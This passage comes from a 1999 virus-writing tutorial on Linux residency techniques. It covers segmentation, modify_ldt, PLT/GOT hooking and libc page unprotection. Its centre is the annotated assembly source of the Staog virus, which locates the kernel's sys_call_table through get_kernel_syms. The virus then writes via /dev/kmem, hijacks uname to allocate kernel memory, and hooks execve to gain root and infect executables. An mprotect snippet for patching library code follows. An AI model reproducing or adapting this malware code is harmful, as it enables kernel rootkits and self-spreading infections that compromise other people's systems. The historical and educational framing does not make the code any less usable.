the said, the real mechanism of protection in Linux is the segmentation, and not the pagination as it occurs in Windows NT. If we would have 4G segments, as in NT, and the pagination would be as ids, we would have free access to kernel memory, but this is not the case. NOTE: Actual versions as 2.2.XX of the core use a protection similar to NT with 4G segments, painfully i haven't been able to look at the page table of that version,but it's a fool thing to think it remains stable Another possibility of achieve Ring-0 in Linux consist is the call to the system call modify_ldt for generate a CALL GATE. That system call was crea- ted for make WINE to be able to emulate windows' memory system, where the user segment descriptors lies at the LDT and not in the GDT, and where it's possible to directionate all the memory with those segments. Generate a CALL GATE with modify_ldt could be possible if we were able to write to every fields of each generated entry, but that's not possible. Firstly, modify_ldt doesn't accepts as an entry an INTEL segment descriptor, it uses this pseudo structure that will be later translated to a descriptor with INTEL format inside the call: struct modify_ldt_ldt_s { unsigned int entry_number; /* The entry we wanna modify */ unsigned long base_addr; /* The base address of the segment */ unsigned int limit; /* The limit of the segment */ unsigned int seg_32bit:1; /* If its of 16 or 32 bits */ unsigned int contents:2; /* If its of data, code or stack */ unsigned int read_exec_only:1; /* Protection attributes */ unsigned int limit_in_pages:1; unsigned int seg_not_present:1; /* If it's in memory or not */ unsigned int useable:1; }; If we see the code of the call in /usr/src/linux/arch/i386/kernel/ldt.c , this code shouws us the transformation of that structure to an INTEL des- criptor: *lp = ((ldt_info.base_addr & 0x0000ffff) << 16) | (ldt_info.limit & 0x0ffff); *(lp+1) = (ldt_info.base_addr & 0xff000000) | ((ldt_info.base_addr & 0x00ff0000)>>16) | (ldt_info.limit & 0xf0000) | (ldt_info.contents << 10) | ((ldt_info.read_exec_only ^ 1) << 9) | (ldt_info.seg_32bit << 22) | (ldt_info.limit_in_pages << 23) | ((ldt_info.seg_not_present ^1) << 15) | 0x7000; ldt_info is the structure we have passed as a parameter,and *lp is a pointer inside the LDT where resides the segment entry we want to modify. Seeing the structure of an INTEL entry we can see the transformation: 63-54 55 54 53 52 51-48 47 46-45 44 43-40 39-16 15-0 base G D R U limit P DPL S type base limit 31-24 19-16 23-0 15-0 With the *lp we fill the 32 first bits of the entry, corresponding to the 16 first bits of the limit and the 16 first bits of the base address, and with *(lp+1) we fill the rest of the information. But after make all the operations with ldt_info, there is an OR operation with the 0x7000 constant. Passing this constant to binary we got 0111000000000000, so we know that always the generated descriptors will have the bits 44, 45 and 46 actives. Those bits correspond with the DPL and the S bit. So we could only create user segments. That doesn't matter, because the segment must be of user for allow its execution by an user, But the next bit, the S bit, has a lot of importance. The bit S is 1 when is a normal segment, and is 0 when a segment is of system like the TSS or the CALL GATES, so the generation of CALL GATES is impossible with the modify_ldt function. Modify_ldt also limits the creation of segments of limit over 0xC0000000, thing that would allow to directionate kernel's space. Modify_ldt checks the limit of the segment we want to create with the limits_OK function, and returns a boolean value as it can ve seen in this instruction. Last would be the last accessible byte by the segment, and first the first one, and the constant TASK_SIZE takes the value 0xC0000000. return (last >= first && last < TASK_SIZE); If we can't write in the IDT, the GDT, the LDT, or the page table for jump to Ring-0, and the call modify_ldt is limited for the generation of CALL GATES, another possibility is to use virtual files for access kernel memory. This has a very important problem, and it's that files as /dev/mem and /dev/kmem are only accessed, by default, by the root. However, it's one of the choices more interesting for the creation of global residents under Linux. Staog is one of the few viruses for Linux that uses this method, also it doesn't wait the root to execute it, as it uses 3 different exploits for access /dev/kmem, but the exploit usages limits it's functionality to few kernel versions. The /dev/kmem allows the access of kernel memory, the first byte of that segment is the same of the first byte of kernel's segment or, what it's the same, the linear address 0xC0000000. .text # This is the code that hooks the # sys_call to execve .string "Staog by Quantum / VLAD" .global main main: movl %esp,%ebp movl $11,%eax # Firstly, checks if it's already movl $0x666,%ebx # resident, calling to execve with int $0x80 # the value 0x666 in EBX, and if it cmp $0x667,%ebx # is in mem, the virii in mem will jnz goresident1 # return the value 0x667 jmp tmpend goresident1: movl $125,%eax movl $0x8000000,%ebx movl $0x4000,%ecx movl $7,%edx int $0x80 This code is very important, because we call to mprotect for unprotect the memory pages used by the virus. This is done for avoid the modification of the ELF file, and put the data of the virus in a data section and the code in one of code. In this way, we can put all the data of the virus in the same page, and it doesn't matter if the virus is in a code section, at the execution time, it unprotects it. NOTE: It is only possible to execute mprotect inside the PerProcess memory. The first it's going to try is to reserve some kernel memory for copy the virus code there, and after will modify the sys_call_table entry that corresponds to the execve for put instead it a pointer to the hooker routine of such function. For reserve memory inside the kernel, it's only possible with kernel internal calls like kmalloc. For be able to execute it, the virus overwrites the system call uname using /dev/kmem, and makes a call to uname with the int 0x80 when it before returning from the interrupt, and it would have already executed the code we used to reserve memory with kmalloc. But before all that, it needs to know uname address. For that, the virus uses the system call get_kernel_syms, with it, it can obtain a list with all the internal Linux functions, and also pointers to structures as the said sys_call_table, that is an array in memory with pointers to the accesible functions with int 0x80, like uname function. movl $130,%eax # Obtain the number of symbols movl $0,%ebx # passing in EBX the value 0 int $0x80 # Returns in EAX:Number of symbols shll $6,%eax # Make a 6 bit shifting to the left. This is # the same as multiply the symbol number by 64 # that are the bytes occupied by each entry # returned by get_kernel_syms # The information obtained is the same that the # located at /proc/ksyms. # 4 bytes with a kernel address and 60 bytes # with symbol's name subl %eax,%esp # Reserve space in the stack movl %esp,%esi # before the call # the ESI register will point to a mem structure pushl %eax movl %esi,%ebx # obtain kernel symbols movl $130,%eax int $0x80 pushl %esi nextsym1: # Here i scan the symbol table in memory movl $thissym1,%edi # seaching the string current (zero-terminated) push %esi addl $4,%esi cmpb $95,(%esi) jnz notuscore incl %esi notuscore: cmpsl cmpsl pop %esi jz foundsym1 addl $64,%esi # Look how it increments 64 by 64 for make the jmp nextsym1 # comparisons foundsym1: movl (%esi),%esi movl %esi,current # Store search result in the variable popl %esi # current pushl %esi nextsym2: # Look also the kmalloc symbol with the movl $thissym2,%edi # same way. push %esi addl $4,%esi cmpsl cmpsl pop %esi jz foundsym2 addl $64,%esi jmp nextsym2 foundsym2: movl (%esi),%esi movl %esi,kmalloc # Store search result in the kmalloc var popl %esi xorl %ecx,%ecx nextsym: # find symbol movl $thissym,%edi # And now sys_call_table address movb $15,%cl push %esi addl $4,%esi rep cmpsb pop %esi jz foundsym addl $64,%esi jmp nextsym foundsym: movl (%esi),%esi pop %eax addl %eax,%esp movl %esi,syscalltable # Store in the syscalltable variable the xorl %edi,%edi # address found. At this point the virus knows the memory position of the sys_call_table opendevkmem: movl $devkmem,%ebx # Open the /dev/kmem file movl $2,%ecx # EBX = Ptr to string with the name call openfile # ECX = Open way ($2 read/write) orl %eax,%eax js haxorroot # If it couldn't be opened, jumps to a movl %eax,%ebx # routine for access /dev/kmem by means # of exploits # Realize that ESI still have the address of the sys_call_table, and if to # that we add 44, we will obtain a pointer to the address where is the ptr # to execve inside the sys_call_table leal 44(%esi),%ecx # lseek to sys_call_table[SYS_execve] call seekfilestart movl $orgexecve,%ecx # Read pointer's value movl $4,%edx # 4 bytes call readfile leal 488(%esi),%ecx # Now move the coresponding entry to call seekfilestart # uname inside the sys_call_table movl $taskptr,%ecx # And read the sys_call_table[SYS_uname] movl $4,%edx # value, and store it in the var taskptr call readfile movl taskptr,%ecx # Move ourselves to the code where is the call seekfilestart # uname function in memory. subl $endhookspace-hookspace,%esp # Reserve space in the stack for the code # that i'm going to overwrite movl %esp,%ecx # Read the code i'm going to overwrite movl $endhookspace-hookspace,%edx # of uname on the stack call readfile movl taskptr,%ecx # Return to the beginning of uname routine call seekfilestart movl filesize,%eax addl $virend-vircode,%eax movl %eax,virendvircodefilesize # Now write the routine for reserve memory over uname's code movl $hookspace,%ecx movl $endhookspace-hookspace,%edx call writefile movl $122,%eax # Make a call to uname, but what's really int $0x80 # going to be executed will be our routine movl %eax,codeto # EAX = address we've reserved movl taskptr,%ecx # Go back to uname's code call seekfilestart movl %esp,%ecx # And restore the uname's original movl $endhookspace-hookspace,%edx # that we had temporally in stack call writefile # to its original place. addl $endhookspace-hookspace,%esp # Remove the memory we had reserved # in the stack subl $aftreturn-vircode,orgexecve movl codeto,%ecx # Move now the pointer to the begin subl %ecx,orgexecve # of the mem zone we had reserved call seekfilestart movl $vircode,%ecx # And write the virus code in it movl $virend-vircode,%edx call writefile leal 44(%esi),%ecx # Search the sys_call_table, relative call seekfilestart # to execve, and i modify the orig. # pointer by our function addl $newexecve-vircode,codeto movl $codeto,%ecx # Write the new ptr in sys_call_table movl $4,%edx call writefile call closefile # close /dev/kmem tmpend: call exit openfile: # System calls made with int 0x80 movl $5,%eax # EAX = Function to do int $0x80 # see /usr/include/sys/syscall.h for a function ret # list closefile: movl $6,%eax int $0x80 ret readfile: movl $3,%eax int $0x80 ret writefile: movl $4,%eax int $0x80 ret seekfilestart: movl $19,%eax xorl %edx,%edx int $0x80 ret rmfile: movl $10,%eax int $0x80 ret exit: xorl %eax,%eax incl %eax int $0x80 thissym: # Here are defined some variables .string "sys_call_table" # See that they're in the same section of # the code. That's why we use mprotect. thissym1: .string "current" thissym2: .string "kmalloc" devkmem: .string "/dev/kmem" e_entry: .long 0x666 infect: # Infection routine # Here should go the ELF infection routine. It consist in generate a # temporal file with the virus code and execute it with execve ret .global newexecve newexecve: pushl %ebp movl %esp,%ebp # In the stack will be all regs, pushl %ebx # see that we're inside an int 0x80 movl 8(%ebp),%ebx pushal cmpl $0x666,%ebx # If EBX = 0x666, we return jnz notserv # 0x667 because it's the residency popal # mark. incl 8(%ebp) popl %ebx popl %ebp ret notserv: call ring0recalc # Calculate the displacement of ring0recalc: # addresses in memory popl %edi subl $ring0recalc,%edi movl syscalltable(%edi),%ebp # EBP = Address of sys_call_table call saveuids call makeroot call infect # Infect the file call loaduids hookoff: popal popl %ebx popl %ebp .byte 0xe9 # Go to the original execve func. orgexecve: # 0xE9 is the jump opocode and the .long 0 # next 4 bytes are the 4 bytes aftreturn: # if the orgexecve variable. The # equivalent would be jmp orgexecve syscalltable: .long 0 current: .long 0 .global hookspace # This is the routine that reserves memory. hookspace: # Its the one that is overwritten by the virus push %ebp # over uname. pushl %ebx pushl %ecx pushl %edx movl %esp,%ebp pushl $3 .byte 0x68 virendvircodefilesize: .long 0 .byte 0xb8 # movl $xxx,%eax ;0xb8 is the opcode of a movl and kmalloc: # the next bytes correpond with the kmalloc var, .long 0 # so, when we find kmalloc in mem, a call %eax # movl $kmalloc,%eax will be generated # and with call %eax we jump to kmalloc for reserve # memory movl %ebp,%esp popl %edx popl %ecx popl %ebx popl %ebp ret .global endhookspace endhookspace: .global virend virend: 2. Global residency in Ring-3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The base of this method of residency consists in the hook of routines in Ring-3 and that are executed by all the processes. The code of Ring-3 that can be executed by all the processes are the libra- ries, in windows are the DLLs. Windows, for example, distributes its space in 4 arenas, each arena has a different utility and has differend code and data. There is one arena dedi- cated to DOS that goes from the virtual address 0 to 40000000, another one dedicated to the PerProcess memory, that goes from 40000000 to 80000000, another that handles the shared memory by all the processes that goes from 80000000 to C0000000, and another dedicated to VXD, i.e. kernel's code, that is executed in Ring-0 and goes from C0000000 to FFFFFFFF. The most important library in windows is the KERNEL32.DLL, and there are the functions of file creation, memory handling, etc. (in linux the equivalent could be the library libc). The files, instead of execute directly TRAP GATES for make the calls to Ring-0 code, use a dynamic link mechanism for jump to library's code (Ring-3 code) that do the jump to Ring-0 for obtain the desired kernel service. Windows 95 commited a great dessign fail, and it is the fact that it loads the majority of libraries in the shared memory arena (KERNEL32 library is load at BFF70000 address). To locate the most important libraries into a shared memory arena has the advantage that the system doesn't have to load the library with each file that imports calls to that library, because it's in the process memory. This fact also makes possible the hook of system calls without the need of jump to Ring-0. Viruses like Win95.HPS and Win95.K32 use this fact for achieve global residence without jumping to Ring-0. However this is not as easy as it gets, because even if the kernel doesn't have protection by pagination, the files have protection by pagina- tion in the code sections (for handle the try of write into the code secti- ons). However, this could be unprotected easily using VXD calls like _pagemodifypermissions or library calls like memoryprotect. In Linux we could try to hook functions like execve of the libc library, located from the virtual address 0x40000000. Any try of a program of write to protected pages will mean protection faults, because there is pagination prtoection in the code sections, as in the code sections of the normal exe- cutables. But the function mprotect also works with library's code, because these are located below 0xC0000000, in the PerProcess memory. Code as the one that follows allows you to unprotect pages of libraries like libc. As we saw in the introduction, the address of the getpid function of libc its loaded in the address 0x40073000 in my Linux version, so we know that it's a code section, so it would be protected againist write attempts. [section .text] [extern puts] [global main] main: pushad mov eax,0125h mov ebx,40073000h mov ecx,02000h mov edx,07h int 80h ; Call to mprotect mov ebp,40073000h xor eax,eax ; Put EAX to 0 mov dword [ebp],eax ; Write EAX value in EBP address popad ; 0x40073000 ret Note that this program without using mprotect would generate a general protection fault. Now try to execute simultaneously 2 copies of the program. The first page would unprotect a libc page and modify the first bytes of the call to getpid putting them to 0; the second copy is stopped by gdb in the main position for test what value is in the 0x40073000 address. The value won't be 0, it would be the original value. This is because Linux doesn't load its libraries in shared arenas, it loads them in the PerProcess memory. But if the PerProcess memory is different for each process, do the libraries get loaded with each executable, occupying unnecessary memory? The answer is NO, the solution is in the copy-on-write mechanism that allows the sharing of read/write memory pages between different processes, when these pages are in the memory of the process. When the program is load in memory, in the 0x40073000 address will be the memory page of the parent program, and if we try to write in it, the system will verify if it's a read/write or read only page. If it's read-only, the system will generate a page fault, and if it's read/write, the OS will generate a copy of that page for the child process, so when the program writes on it, it's really writing to an own page, not to the parent page. This method allows the share of libraries in memory, preserving the security, avoiding undesired attempts of global residency. Linux implements shared memory, but it's only for inteprocess communication mechanisms (IPC). 3. PerProcess residency ~~~~~~~~~~~~~~~~~~~~~~~ As i explained in the chapter of ELF infection, the ELF format is a very potent format, and between its important funcitonalities resides the dynamic link of functions. The Linux executables don't usually use the int 0x80, they leave that job to libraries like libc. With the usage of libraries we earn disk space, because that code is not inserted inside the executable each time. But these libra- ries can be loaded in any address of the PerProcess memory. This makes necessary the existence of one mechanism that allow the call to functions in files or different libraries, this mechanism is the dynamic link. There are 2 main sections that are there for make the dynamic link of functions. The section .plt (Procedure Linkage Table) and the section .got (Global Offset Table). Linux's dinamic link system had advantages among all the other systems. The PE format of Windows, for example, has specific sections for the linkage such as the Import Table, in it there are as many entryes as functions imported from libraries, and that references are resolved at load-time. In Linux, however, doesn't resolve them in load-time, it waits for the first execution of a system call for resolve the reference of that function. With the first execution, the program gives the control to the dynamic linker, that is a function inside the library we want to call, then the linker resolves the refernce and puts the absolute address of the system call in a table in memory called .got, so the next functions will jump directly to the function without needing to call previously to the dynamic linker. With that,we make better the system productivity avoiding to have to resolve that memory reference that maybe the executable won't execute. If we disassemble the next executable... #include void main() { getpid(); /* 1st call to getpid */ getpid(); /* 2nd call to getpid */ } We obtain the following assembler code 0x8048480
: pushl %ebp 0x8048481 : movl %esp,%ebp 0x8048483 : call 0x8048378 0x8048488 : call 0x8048378 0x804848d : movl %ebp,%esp 0x804848f : pop %ebp 0x8048490 : ret The calls to GETPID will be built as a jump to an entry in then .plt secti- on, as we can see with the command "info file", the section .plt is mapped between 0x08048368 and 0x080483C8. If we continue tracing inside the .plt code we will see the following code: 0x8048378 : jmp *0x80494e8 0x804837e : push $0x0 0x8048383 : jmp 0x8048368 <_init+8> This will be the basic structure of a .plt entry. The first jmp will be a jump to the address contained in the address 0x80494E8. This address is part of the .got table, and in the load-time will have the value 0x804837E. (gdb)x 0x80494e8 0x80494e8 <__DTOR_END__+16>: 0x0804837e As it's the first time we call to GETPID in the executavle, this will have to make a jump to the dynamic linker for obtain the address of the function in the library. For that it makes a push 0x0, where 0x0 is the pointer inside the reloc area that specifies to the dynamic linker what's the .got entry it has to modify. After, it makes a jmp 0x8048368, where 0x8048368 is the address of the first entry of the .plt section. The first entry of the .plt is special, because it's only used for call to the dynamic linker. If we contine debugging, we'll see the structure of the first .plt entry. 0x8048368 <_init+8>: pushl 0x80494e0 0x804836e <_init+14>: jmp *0x80494e4 Firstly, it puts on stack the value 0x80494E0, that corresponds with the 2nd entry in the .got table, and after it makes a jump to the address contained in 0x80494E4 (the third entry of the .got). The 3 first entries of the .got doesn't contain pointers to the .plt at load-time, they are special entries. The first one contains a pointer to the .dynamic section, and the third one is filled with a pointer to the position of the dynamic linker. (gdb)x 0x80494e4 0x80494e4<__DTOR_END__+12>: 0x40004180 So if we continue tracing, we'll see the code of the dynamic linker, already in the memory space of the library. When the program returns from the system call, in the .got section corresponding to GETPID, the linker will have put the absolute address of the function. If we continue tracing, in the second call to GETPID, we could see the new value in the .got section. (gdb)x 0x80494e8 0x80494e8 <__DTOR_END__+16>: 0x40073000 so,with the instruction jmp *0x80494E0 we will jump directly to the function without calling to the dynamic linker. This mechanism allows the hook of system calls inside the memory of the own process, it's the denominated PerProcess residency. A virus with this mecha- nism can hook, for example, the execve call, modifying the .plt entry that corresponds with that call, exchanging the jmp *address_in_got by a jmp *virus_address. However, the virus, being executed in Ring-3, will have the eternal limitations in the file access, and will be only able to infect the files the user can have access to. Another limitation is that it only hooks system call in contaminated files. Clean files being executed won't have their calls hooked by the virus. However, the possibilities of this method are really impressive, if a command interpret like bask or sh is infected, then, because they are commands executed by all users, the hook of execve in a PerProcess way could be as effective as a global residency. (c) 1999 Mr Anonymous [ Original Article ] (c) 1999 Billy Belcebu/iKX [ Translation ]